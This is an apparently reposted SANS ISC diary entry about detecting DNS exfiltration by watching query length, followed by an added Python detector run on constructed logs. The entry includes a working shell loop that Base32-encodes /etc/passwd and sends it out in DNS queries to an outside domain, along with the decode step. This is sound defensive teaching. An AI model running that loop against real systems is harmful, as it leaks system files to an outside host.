One Article Review

Home - The article:
Source SANS Institute
Identifier 359221
Publication date 2017-04-20 07:07:42 (viewed: 2017-04-20 07:07:42)
Title DNS Query Length... Because Size Does Matter, (Thu, Apr 20th)
Text
In many cases, DNS remains a goldmine to detect potentially malicious activity. DNS can be used in multiple ways to bypass security controls. DNS tunnelling is a common way to establish connections with remote systems. It is often based on TXT records used to deliver the encoded payload. TXT records are also used for good reasons, like delivering SPF records, but too many TXT DNS requests could mean that something weird is happening on your network. Instead of using TXT records, data exfiltration may occur directly via the FQDN (Fully Qualified Domain Name). RFC 1035[1] states that a DNS query length is 255 characters total, with each subdomain being 63 characters or less. By using Base32 encoding[2], we can encode our data in strings compatible with the DNS requirements: A-Z, 0-9 and -.

    $ cat /etc/passwd | base32 -w 63 | while read L
    do
      # one query per 63-character line of Base32 output
      dig $L.data.rootshell.be @192.168.254.8
    done

Note: the parameter -w 63

    $ grep data.rootshell.be queries.log
    20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8)
    ...

To decode this on the attacker:

    $ grep data.rootshell.be queries.log | cut -d ' ' -f8 | cut -d . -f1 | base32 -d | more
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    ...

We don't

    # tcpdump -vvv -s 0 -i eth0 -l -n port 53 | egrep "A\? .*\.data\.rootshell\.be"
    tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    172.x.x.x.40335 > 192.168.254.8.53: [udp sum ok] 9843+ [1au] A? OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    172.x.x.x.35770 > 192.168.254.8.53: [udp sum ok] 19877+ [1au] A? YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    172.x.x.x.41463 > 192.168.254.8.53: [udp sum ok] 29267+ [1au] A? QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    172.x.x.x.38048 > 192.168.254.8.53: [udp sum ok] 30042+ [1au] A? 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    ...

As you can see, we just used standard DNS requests to exfiltrate data. To detect this, keep an eye on your DNS logs and particularly the query length. The following graph [image not reproduced on this page].

But, as usual, not all big DNS queries are suspicious. Some CDNs:

    hxxps://2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com/Product/178ee827-0671-4f17-b75b-2022963f5980.pdf

To reduce the risk of false positives, this control can be combined with others:
- The volume of traffic per IP
- The volume of traffic per (sub-)domain
- White-lists

This technique is not new but comes back regularly.

References:
[1] https://www.ietf.org/rfc/rfc1035.txt
[2] https://en.wikipedia.org/wiki/Base32
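The detection side of the diary (watch the query length, then combine it with per-IP and per-domain volume and a white-list) as a worked example. This is added code, not the diary's own or the author's: it parses query log lines in the BIND format shown above, scores each name on total length, longest label and whether that label is made only of Base32 symbols, skips white-listed suffixes, and counts queries per client and per (sub-)domain so that short trailing chunks are still caught. The regex, every threshold, the white-list, the hostnames, the client addresses and the sample log lines are constructed assumptions for the demonstration; only the rackcdn.com hostname is taken from the diary's own example.

```python
"""Length-based detection of FQDN exfiltration in BIND-style query logs.

Added example, not code from the SANS ISC diary. Thresholds, names and
sample lines are constructed assumptions; tune them to your own baseline.
"""
import base64
import re
from collections import Counter

# BIND query log line as printed in the diary (regex is an assumption).
LOG_RE = re.compile(
    r"client (?P<client>[0-9A-Za-z.:]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)

# RFC 1035 limits.
MAX_QNAME_LEN = 255
MAX_LABEL_LEN = 63

# Assumed tuning thresholds (not from the diary).
LONG_QNAME_LEN = 75        # flag a query name longer than this
LONG_LABEL_LEN = 50        # flag a single label longer than this
MIN_BASE32_LABEL_LEN = 20  # a label this long made only of Base32 symbols
VOLUME_PER_DOMAIN = 5      # queries from one client under one (sub-)domain
WHITELIST = ("rackcdn.com",)  # assumed suffixes known to use long hostnames

BASE32_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=")


def parse_line(line):
    """Return (client, qname) for a query log line, or None if it is not one."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return m.group("client"), m.group("qname").rstrip(".").lower()


def is_whitelisted(qname):
    return any(qname == w or qname.endswith("." + w) for w in WHITELIST)


def looks_base32(label):
    """Long label built only from the Base32 alphabet (A-Z, 2-7, '=').
    Hex-looking CDN labels contain 0/1/8/9 and therefore do not match."""
    return len(label) >= MIN_BASE32_LABEL_LEN and set(label.upper()) <= BASE32_CHARS


def score_qname(qname):
    """Return the list of indicators that fire for one query name."""
    labels = qname.split(".")
    longest = max(labels, key=len)
    reasons = []
    if len(qname) > LONG_QNAME_LEN:
        reasons.append("long qname (%d chars)" % len(qname))
    if len(longest) > LONG_LABEL_LEN:
        reasons.append("long label (%d chars)" % len(longest))
    if looks_base32(longest):
        reasons.append("base32-looking label")
    return reasons


def analyze(lines):
    """Scan log lines; return (per-query alerts, per-client/domain volume alerts)."""
    query_alerts = []
    volume = Counter()  # (client, parent domain) -> number of queries
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, qname = parsed
        if is_whitelisted(qname):
            continue
        # Aggregate on the three right-most labels, e.g. data.example.net.
        parent = ".".join(qname.split(".")[-3:])
        volume[(client, parent)] += 1
        reasons = score_qname(qname)
        if reasons:
            query_alerts.append((client, qname, reasons))
    volume_alerts = [(c, d, n) for (c, d), n in volume.items() if n >= VOLUME_PER_DOMAIN]
    return query_alerts, volume_alerts


def build_sample_log():
    """Constructed sample lines in the diary's log format (not real traffic)."""
    # 285 bytes -> 456 Base32 characters: seven 63-char labels plus a 15-char tail
    # that is too short to be flagged on its own and is only caught by volume.
    payload = (b"constructed sample payload, not real data. " * 7)[:285]
    encoded = base64.b32encode(payload).decode()
    chunks = [encoded[i:i + MAX_LABEL_LEN] for i in range(0, len(encoded), MAX_LABEL_LEN)]
    lines = [
        "20-Apr-2017 08:32:11.%03d queries: info: client 172.16.0.10#4%04d: "
        "query: %s.data.example.net IN A +E (192.0.2.8)" % (i, i, chunk)
        for i, chunk in enumerate(chunks)
    ]
    lines += [
        "20-Apr-2017 08:32:12.000 queries: info: client 172.16.0.11#51000: "
        "query: www.example.com IN A +E (192.0.2.8)",
        # Long but legitimate CDN hostname (the diary's own example), white-listed.
        "20-Apr-2017 08:32:12.050 queries: info: client 172.16.0.11#51001: query: "
        "2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com "
        "IN A +E (192.0.2.8)",
        # Long hex label on a non-white-listed domain: long, but not Base32-looking.
        "20-Apr-2017 08:32:12.100 queries: info: client 172.16.0.12#51002: query: "
        "0123456789abcdef0123456789abcdef0123456789abcdef0123.cdn.example.org "
        "IN A +E (192.0.2.8)",
        "this line is not a query log entry",
    ]
    return lines


if __name__ == "__main__":
    q_alerts, v_alerts = analyze(build_sample_log())
    for client, qname, reasons in q_alerts:
        print("ALERT  %s %s...: %s" % (client, qname[:40], ", ".join(reasons)))
    for client, domain, n in v_alerts:
        print("VOLUME %s -> %s: %d queries" % (client, domain, n))
```

The per-query indicators alone miss the last, short chunk of the constructed transfer; the volume counter keyed on (client, parent domain) still reports it, which is the diary's point about combining the length check with traffic volume and a white-list.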
Sent Yes
Tags
Stories APT 18